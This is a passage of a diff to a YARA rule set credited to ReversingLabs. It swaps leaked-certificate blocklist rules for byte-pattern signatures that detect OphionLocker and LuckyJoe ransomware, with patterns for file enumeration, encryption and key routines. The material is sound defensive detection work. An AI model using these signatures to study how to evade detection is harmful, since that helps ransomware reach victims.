?? ?? 59 3B F0 75 ?? 57 E8 ?? ?? ?? ?? 59 85 C0 75 + ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5E FF 75 ?? 8B 5D ?? 53 E8 ?? ?? ?? ?? 59 59 84 C0 75 + ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? EB ?? 0F B6 C3 5B 5F 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA G2" and pe.signatures[i].serial=="0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3e" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_469C2Cb0 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ophionlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects OphionLocker ransomware." author = "ReversingLabs" - id = "dd19b988-747d-55b9-825b-2ada1ca83691" - date = "2023-11-08" - modified = "2023-11-08" + id = "75335749-66bd-539e-92b3-dd92c0b332d8" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L945-L961" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "67ff84475cbe231f97daa3ce623689e7936db8e56be562778f8a4c1ebf7bf316" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.OphionLocker.yara#L1-L105" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c54a948a6a45ec5f5bc32fbbdbc8822f402b1332e9109b20b90635464dbe2ac" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "OphionLocker" + tc_detection_factor = 5 importance = 25 + strings: + $ol_do_filetypes_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 33 DB 53 89 5D ?? 53 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + } + $ol_do_filetypes_2 = { + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 89 5D ?? 50 + 8D 85 ?? ?? ?? ?? 89 5D ?? 50 53 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 + ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 8D 75 ?? 50 E8 ?? ?? + ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 58 89 45 ?? 89 5D ?? 88 5D ?? 89 45 ?? 89 + 5D ?? 88 5D ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 8B 39 E9 00 01 00 00 8B 77 ?? + 8D 47 ?? 89 45 ?? 3B 77 ?? 0F 84 EC 00 00 00 8B F8 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 50 8D 4D ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 4D + } + $ol_do_filetypes_3 = { + ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? + 89 65 ?? 8D 45 ?? 83 EC ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + 81 C4 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? + ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 83 C4 ?? 3B 77 ?? 0F + 85 1C FF FF FF 8B 4D ?? 8B 7D ?? 8B 3F 89 7D ?? 3B F9 0F 85 F5 FE FF FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 + ?? ?? 8D 85 ?? ?? ?? ?? 89 65 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? ?? ?? ?? C6 45 + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B + CC E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 33 F6 8D 8D + ?? ?? ?? ?? 53 46 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 53 56 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? + ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C3 + } + $ol_ecies_key_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 8B F9 33 DB 89 5D ?? 8D 8D ?? ?? ?? ?? 89 7D ?? 89 5D ?? E8 ?? + ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 46 8D 8D ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B + CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? + ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 50 56 FF 75 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 0F 85 40 03 00 00 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B B4 05 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 50 8B 85 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 FF 56 ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BB ?? + ?? ?? ?? 8D 4D ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 83 7D ?? ?? 8D 4D ?? 8B F0 + 0F 43 4D ?? 51 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B 06 52 8B 48 ?? 03 CE 8B 01 FF 50 ?? + C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 0D 8B 01 6A ?? 8B 40 ?? 03 C8 8B 01 FF 10 33 F6 C6 45 ?? ?? 56 6A ?? 8D 4D ?? E8 + ?? ?? ?? ?? 83 EC ?? 8B CC 53 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + } + $ol_ecies_key_2 = { + 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 53 + E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 + ?? ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? + 56 E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 + E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 33 F6 C6 45 ?? ?? 56 50 8D 4D ?? E8 ?? ?? + ?? ?? 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B CC 89 65 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 53 E8 ?? + ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? + 56 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + } + $ol_ecies_key_3 = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB 30 83 EC ?? 8D 55 ?? 8B CC 89 65 ?? E8 + ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC BB ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 51 8D 4F ?? + E8 ?? ?? ?? ?? 8D 77 ?? C7 07 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 53 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 46 ?? C6 45 ?? ?? 85 C0 74 05 8D 4E ?? EB 02 33 C9 8D 55 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 8B 06 8B CE FF 50 ?? 6A ?? 68 ?? ?? ?? ?? 8B 08 8B 49 ?? 03 C8 8B 01 FF 50 ?? 53 E8 ?? ?? ?? ?? 59 6A ?? + 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 64 89 0D ?? ?? ?? ?? 5B + 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Services 1024 CA" and pe.signatures[i].serial=="46:9c:2c:b0" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($ol_do_filetypes_1 and $ol_do_filetypes_2 and $ol_do_filetypes_3) and ($ol_ecies_key_1 and $ol_ecies_key_2 and $ol_ecies_key_3)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4C0E636A : INFO FILE +rule REVERSINGLABS_Linux_Ransomware_Luckyjoe : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects LuckyJoe ransomware." author = "ReversingLabs" - id = "beb2039c-3b0e-5649-96ca-40175493e62c" - date = "2023-11-08" - modified = "2023-11-08" + id = "8dc98d71-b79d-5b09-9383-11f2b57baeb5" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L963-L979" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "20169cf9ce3f271a22d1376bcf0ff0914f43937738c9ed61fd8e40179405136b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Linux.Ransomware.LuckyJoe.yara#L1-L146" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1e7df2c45bee072af233cf8f355a84ec931fe96afa3fbdcd225dded1b75ea961" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "LuckyJoe" + tc_detection_factor = 5 importance = 25 + strings: + $main_call_p1 = { + 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 + C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? + 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 75 ?? 48 + 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? BE ?? ?? + ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8 + ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? + ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 35 ?? ?? ?? ?? 48 83 EC ?? 48 8B 45 + ?? 6A ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 + E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? + ?? ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? + ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 + } + $main_call_p2 = { + 89 C7 E8 ?? ?? ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? + ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 + ?? 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C2 + 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 45 ?? 48 + 01 D0 C6 00 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 D0 C6 00 ?? 48 8B 45 ?? 48 8B 55 ?? 48 + 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? BF ?? ?? ?? ?? E8 ?? + ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? B8 + ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? + 48 83 7D ?? ?? 74 ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 + } + $main_call_p3 = { + E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? + ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? + ?? ?? 48 C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 + ?? 48 83 7D ?? ?? 74 ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ?? 48 89 + C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 8B 84 + C5 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 98 + 48 8B 84 C5 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 74 ?? BF ?? + ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 + ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files_p1 = { + 55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? + ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 D6 F3 48 A5 48 89 F2 48 89 F8 0F B7 0A 66 89 + 08 48 8D 40 ?? 48 8D 52 ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 + F3 48 AB 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 + ?? 48 8B 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 + E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? + 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 + 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? + ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? + ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8B 45 + ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 + 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? + ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 45 ?? 48 + } + $encrypt_files_p2 = { + 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? + ?? EB ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 89 45 ?? 48 83 7D ?? ?? 75 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 + 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? ?? + 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? + ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 + ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 89 C7 E8 ?? + ?? ?? ?? 48 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? + ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B + 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 + C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F + 85 ?? ?? ?? ?? 48 